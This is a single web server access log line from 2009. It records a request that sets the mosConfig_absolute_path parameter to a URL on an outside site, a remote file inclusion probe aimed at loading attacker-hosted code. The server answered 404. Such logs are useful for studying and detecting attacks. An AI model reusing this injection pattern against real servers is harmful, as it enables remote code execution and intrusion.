12.46.124.72 - - [06/Oct/2009:01:01:02 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
